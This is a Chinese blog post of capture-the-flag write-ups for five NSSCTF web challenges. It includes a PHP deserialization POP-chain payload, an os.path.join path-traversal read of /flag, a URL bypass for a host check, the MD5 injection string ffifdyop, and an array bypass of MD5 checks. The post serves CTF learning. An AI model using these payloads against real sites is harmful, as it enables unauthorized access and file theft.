首页 前端知识 NSSCTF中的pop、babyupload、cve版本签到、奇妙的MD5、easy_html

NSSCTF中的pop、babyupload、cve版本签到、奇妙的MD5、easy_html

2024-09-12 23:09:30 前端知识 前端哥 373 766 我要收藏

目录

[SWPUCTF 2021 新生赛]pop

[NISACTF 2022]babyupload 

​编辑[GKCTF 2020]cve版签到 

[SWP5UCTF 2022 新生赛]奇妙的MD5

[HNCTF 2022 Week1]easy_html 

今日总结:


[SWPUCTF 2021 新生赛]pop

1.代码审计

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}
//这是一个名为 w44m 的类。它有两个属性:$admin 和 $passwd,分别被初始化为 'aaa' 和 '123456'。它还有一个公共方法 Getflag,该方法检查 $admin 和 $passwd 是否与特定的值匹配。如果匹配,则包含并输出 flag.php 文件中的 $flag 变量的值。如果不匹配,则输出 $admin、$passwd 和 'nono'。
class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}
//这是一个名为 w22m 的类,它有一个公共属性 $w00m。当该类的实例被销毁时(例如,在脚本结束时或当不再有对该实例的引用时),__destruct 魔术方法会被调用,并输出 $w00m 的值。
class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}
//这是一个名为 w33m 的类,它有两个公共属性:$w00m 和 $w22m。当该类的实例被当作字符串使用时(例如,在字符串连接中),__toString 魔术方法会被调用。该方法尝试调用 $w00m 对象上的 $w22m 方法。如果 $w00m 是一个对象,并且该对象有一个名为 $w22m 的方法,那么这个方法就会被执行
$w00m = $_GET['w00m'];
unserialize($w00m);//这部分代码首先从 GET 请求中获取 w00m 参数的值,并尝试对其进行反序列化。反序列化是将已存储的表示形式或字节流转换回 PHP 值的过程。

?> 

2.分析php代码

题目要求GET传入w00m,并进行反序列化操作

  • w44m类:

如果变量前是protected,则会在变量名前加上\x00*\x00,

若是private,则会在变量名前加上\x00类名\x00,输出时一般需要url编码

  • w22m类:

当类销毁时会输出$this->w00m

  • w33m类:

当w33m类的对象被当做字符串使用时,触发__toString()方法

 3.该题目中涉及到的魔术方法有两个toString和destruct,构造pop链的关键是紧盯魔术方法,找到pop链的头部和尾部,可以看到GET方式传参w00m,也就是pop链的头部,然后就是尾部,尾部就是能够达到恶意攻击的地方,在上述的题目中,清晰可见:w44m类中存在着一个方法GETflag方法,便可输出最终的flag,因此这也是我们的pop链的尾部。

如何调用w44m类中Getflag方法?
在w33m类中tostring方法,可以调用某一个类中的某一个方法。
因此可以给w33m类中的两个变量w00m=w44m类名,w22m=Getflag方法
如何调用w33m类呢?
destruct在对象被销毁时调用,所以给w22m类中的变量w00m一个类w33m就可以调用

综上,POP链:

w22m::__destruct()->w33m::__toString()->w44m::Getflag()

 4.在线php构造序列化字符串如下:

<?php
class w44m{
	private $admin = 'w44m';
    protected $passwd = '08067';}
class w22m{
    public $w00m;}
class w33m{
    public $w00m;
    public $w22m;}
$a=new w22m;
$a->w00m= new w33m;
$a->w00m->w00m= new w44m;
$a->w00m->w22m= "Getflag";
var_dump(serialize($a));
?>

资料:PHP类中public、protected、private的区别 PHP类中public、protected、private实例代码_李涛自留地-李涛生活目录和编程学习网络笔记本

5.其中未显示的是空格,即\x00,因为有私有属性,所以进行url编码

6.构造之后,得到flag

payload:?w00m=O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{s:11:"w44madmin";s:4:"w44m";s:9:"*passwd";s:5:"08067";}s:4:"w22m";s:7:"Getflag";}}

[NISACTF 2022]babyupload 

1.查看源代码,发现可疑文件

2.访问之后得到一个压缩包,解压之后得到以下内容

 

3. 打开txt文件,发现以下内容,但是访问之后没有什么

对另一个文件进行代码审计:

发现这串代码用来用于处理文件上传和下载, def upload()处理文件上传。如果文件名包含 .(后缀),则拒绝上传(这可能是为了防止某些类型的文件上传,但这种方法不是很安全)。否则,将文件保存到 uploads/ 目录,并将文件信息保存到数据库中。def file()根据提供的 id,从数据库中查询文件路径,然后读取文件内容并返回。

4.这里涉及到os.path.join()的绝对路径拼接漏洞:

绝对路径拼接漏洞:

os.path.join(path,*paths)函数用于将多个文件路径连接成一个组合的路径。第一个函数通常包含了基础路径,而之后的每个参数被当作组件拼接到基础路径之后。

然而,这个函数有一个少有人知的特性,如果拼接的某个路径以 / 开头,那么包括基础路径在内的所有前缀路径都将被删除,该路径将视为绝对路径

os.path.join()函数:
第一个以”/”开头的参数开始拼接,之前的参数全部丢弃,当有多个时,从最后一个开始

资料:Python中os.path.join函数的用法示例详解_python_脚本之家

5.利用函数的特性,使用/flag,直接跳转到最后一个文件读取flag文件 

[GKCTF 2020]cve版签到 

1.进入页面,发现没有什么,所以抓包看看,发现hint 

2.起初的页面说You just view *.ctfhub.com,说我们url请求必须包含.ctfhub.com,所以这里想到截断

截断原理:截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0字符的方式,达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制。

3.看到Tips: Host must be end with '123',主机位必须以123结尾,所以继续构造,得到flag

?url=http://127.0.0.123www.ctfhub.com

[SWP5UCTF 2022 新生赛]奇妙的MD5

1.进入页面,提示有一串奇妙的字符串,又是关于MD5的,猜测是一个是 MD5 加密后弱比较等于自身,这个字符串是 0e215962017 :另一个是 MD5 加密后变成万能密码,这个字符串是 ffifdyop

2.尝试ffifdyop,跳转到以下页面   

 3.查看源代码

4.绕过md5的弱比较,得到一个文件,访问这个文件

5. 根据要求使用数组来绕过md5的强比较,得到flag

[HNCTF 2022 Week1]easy_html 

1.打开页面,发现关键信息“饼干”,翻译过来就是cookie,想到使用抓包,发现"Set-Cookie: flagisin=./f14g.php",其中/是/的url编码

2.所以访问这个文件,得到以下页面

3.经过尝试发现只能输入十位,但正常情况手机号是十一位,所以想到修改前端的代码,再次输入十一位的号码,得到flag

今日总结:

1.学习了php反序列化的pop链

2.了解了os.path.join()的绝对路径拼接漏洞

3.修改主机位时,当主机位必须以123结尾,如:127.0.0.1修改为127.0.0.123

4.关于MD5的奇妙的字符串

转载请注明出处或者链接地址:https://www.qianduange.cn//article/18152.html
标签
评论
发布的文章

3.1 requests与JSON基础

2024-10-15 23:10:08

React 安装(NPM)

2024-10-15 23:10:15

大家推荐的文章
会员中心 联系我 留言建议 回顶部
复制成功!